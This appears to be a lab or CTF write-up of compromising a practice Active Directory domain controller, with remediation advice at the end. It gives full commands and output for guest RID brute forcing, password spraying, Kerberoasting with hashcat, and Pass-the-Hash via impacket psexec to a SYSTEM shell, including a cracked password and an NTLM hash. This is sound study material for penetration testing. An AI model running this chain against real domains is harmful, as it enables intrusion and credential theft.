AD guest RID brute, Kerberoast, and Pass-the-Hash to SYSTEM
Foundations Active Directory engagement: guest SMB enabled RID brute and username=password spray; Kerberoast cracked file_svc; backup share hashes Pass-the-Hash’d as FileServer$ via PsExec to SYSTEM.
- Case files
- AD guest RID brute, Kerberoast, and Pass-the-Hash to SYSTEM
Guest access enumerated users; password spray landed ybob317. Kerberoast recovered file_svc; backup NTLM hashes authenticated FileServer$ for a SYSTEM shell.
crackmapexec guest RID brute built users.txt; spray recovered ybob317.
GetUserSPNs requested TGS hashes; rockyou cracked Password123!! for file_svc.
backup_extract.txt NTLM spray hit FileServer$; psexec yielded SYSTEM.
Engagement summary
Guest access enumerated users; password spray landed ybob317. Kerberoast recovered file_svc; backup NTLM hashes authenticated FileServer$ for a SYSTEM shell.
SOUPEDECODE 01 (DC01.SOUPEDECODE.LOCAL) presented a full AD port set. Guest SMB with empty password allowed RID brute into a user list. Spraying username=password hit ybob317:ybob317 and the Users share for the user artifact. GetUserSPNs Kerberoasted file_svc; hashcat recovered Password123!!. file_svc could read the backup share’s extract of NTLM hashes; spraying those hashes authenticated FileServer$ (Pwn3d). impacket psexec with the machine-account hash dropped a SYSTEM shell on the DC.
Business impact
Guest RID cycling and password-equals-username are domain footholds. Weak Kerberoastable service passwords and dumped NTLM hashes enable lateral movement to machine accounts. Disable guest, enforce password policy, protect SPN accounts with long random secrets, and restrict backup share ACLs.
Guest RID brute and password spray
crackmapexec guest RID brute built users.txt; spray recovered ybob317.
OPERATOR · GUEST / SPRAY
savvy@lab:~$ nmap -sV -sC -Pn 10.201.91.100
88/tcp kerberos 445/tcp smb 389/tcp ldap
savvy@lab:~$ crackmapexec smb 10.201.91.100 -u guest -p '' --rid-brute
savvy@lab:~$ crackmapexec smb 10.201.91.100 -u users.txt -p users.txt --no-bruteforce --continue-on-success
[+] SOUPEDECODE.LOCAL\ybob317 : ybob317
Kerberoast file_svc
GetUserSPNs requested TGS hashes; rockyou cracked Password123!! for file_svc.
OPERATOR · KERBEROAST
savvy@lab:~$ python3 GetUserSPNs.py SOUPEDECODE.LOCAL/ybob317:ybob317 -dc-ip 10.201.1.205 -request -outputfile hash.txt
savvy@lab:~$ hashcat hash.txt /usr/share/wordlists/rockyou.txt --show
file_svc:Password123!!
Backup hashes and Pass-the-Hash SYSTEM
backup_extract.txt NTLM spray hit FileServer$; psexec yielded SYSTEM.
OPERATOR · PTH
savvy@lab:~$ crackmapexec smb 10.201.1.205 -u file_svc -p 'Password123!!' --shares
backup READ
savvy@lab:~$ crackmapexec smb 10.201.1.205 -u users_hashes.txt -H hashes.txt --no-bruteforce
[+] SOUPEDECODE.LOCAL\FileServer$:e41da7e7... (Pwn3d!)
savvy@lab:~$ python3 psexec.py 'soupedecode.local/FileServer$'@10.201.1.205 -hashes 'aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559'
C:\Windows\system32>
C:\Windows\system32> whoami
nt authority\system
Remediation
Disable guest and anonymous RID. Ban password=username. Use gMSA or 25+ char SPN passwords. Encrypt and ACL backup extracts; monitor machine-account logons from unusual hosts.